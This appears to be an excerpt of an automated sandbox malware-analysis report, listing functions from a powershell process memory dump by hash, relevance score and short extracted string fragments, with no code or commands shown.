                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o_q$(o_q$(o_q$(o_q
                                      • API String ID: 0-3600592161
                                      • Opcode ID: b1916b224581a61512bd21dde29f55951dd67102fca6eee4e2100dc8ed41d5da
                                      • Instruction ID: 06fd4c150ce2d1fd927cfecfe061453b46a0dafad15a7b7f10bb57cd098e369f
                                      • Opcode Fuzzy Hash: b1916b224581a61512bd21dde29f55951dd67102fca6eee4e2100dc8ed41d5da
                                      • Instruction Fuzzy Hash: 27F136B1744206EFDF548F68C8147AABBE2BF81310F14C67AE515CB291DB35D841DBA1
                                      Function 07097A30 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84.l$84.l$tP_q$tP_q
                                      • API String ID: 0-2487460135
                                      • Opcode ID: ca2ef6da907f680994a5b1c8c394fd5b55a01cbd7237e35fdf3921ccb119a96e
                                      • Instruction ID: f47a621aa80e08d3093d1f30f48b8beb7e7e2b80873a3d72a186e513c231fac5
                                      • Opcode Fuzzy Hash: ca2ef6da907f680994a5b1c8c394fd5b55a01cbd7237e35fdf3921ccb119a96e
                                      • Instruction Fuzzy Hash: B5915CB27202069FCF185E69C850B7EBBE6AFC5710F28857AD815DB391DA31CC41D7A1
                                      Function 07091F1F Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$o$$_q$$_q
                                      • API String ID: 0-1135250939
                                      • Opcode ID: 4d4a37543ffe241a996a23cbd58cd68336e396a7f0f43bc7d0f824276d8c7a26
                                      • Instruction ID: b843efbf7d7e9861755d2cd1c2d421dcff9db55a135cc739a4b7758f18e50123
                                      • Opcode Fuzzy Hash: 4d4a37543ffe241a996a23cbd58cd68336e396a7f0f43bc7d0f824276d8c7a26
                                      • Instruction Fuzzy Hash: 91310FF1A0424FAECFA44F61851036ABBE5BF82210F1883B7CA14CB1A2E735C544E792
                                      Function 07091070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q$$_q
                                      • API String ID: 0-1171383116
                                      • Opcode ID: 9e22d9562114758b80a0e2444e4879cc234f3688d8510e03c798cc6001e4d082
                                      • Instruction ID: 6955d0b14e783de5bc273c04e383ac26543ca545e6c4cf9aa8dbe707767be65a
                                      • Opcode Fuzzy Hash: 9e22d9562114758b80a0e2444e4879cc234f3688d8510e03c798cc6001e4d082
                                      • Instruction Fuzzy Hash: A22137B131024BABDFA85B6A8801B2BA6DA5FC1711F30853AE519D7381DDBAC8419361
                                      Function 07092E90 Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,S0l$4'_q$d5 k$xS0l
                                      • API String ID: 0-2182700223
                                      • Opcode ID: b3aa008a227934978a3927412d55205073cf8d1ac8e6cedf3882b08124006792
                                      • Instruction ID: f15ee62f315c5239adce45bffd79cd3956468098daf098f95127f93712d3caa2
                                      • Opcode Fuzzy Hash: b3aa008a227934978a3927412d55205073cf8d1ac8e6cedf3882b08124006792
                                      • Instruction Fuzzy Hash: 183191F1B00306ABCFA48E18C4A1B6BF7E6BB85714B148279E9149B251E731D990DBA1
                                      Function 0709B8C8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q$$_q
                                      • API String ID: 0-1171383116
                                      • Opcode ID: 7ecfd9e9f6dec93ac78a1eefecb91849112e05fb94c9e63fc77f60ba4e417acb
                                      • Instruction ID: 4b41a001b863611f3d2a235f20aee547e9b602ce14862ab768069ee5ab6e9af9
                                      • Opcode Fuzzy Hash: 7ecfd9e9f6dec93ac78a1eefecb91849112e05fb94c9e63fc77f60ba4e417acb
                                      • Instruction Fuzzy Hash: E511E1F1A2430BDFCFB48E5AA44077AB7F8AF82630F14427AD81587201DB31C540EB91
                                      Function 07091D49 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$$_q$$_q
                                      • API String ID: 0-1173716036
                                      • Opcode ID: abc6621e00632d53b4f1e9ba928fe3e5b4414ef8a45ceb5c892ccb37eb094cc6
                                      • Instruction ID: a6f80bf2e54051f0d460293b2822e69094cb1d3a0d1a2e581d92625a1f428bba
                                      • Opcode Fuzzy Hash: abc6621e00632d53b4f1e9ba928fe3e5b4414ef8a45ceb5c892ccb37eb094cc6
                                      • Instruction Fuzzy Hash: 6701D6A1B4F38B5FD71F173848202555FF25FD3584B1A46ABD441CF2D7DA588D0583A2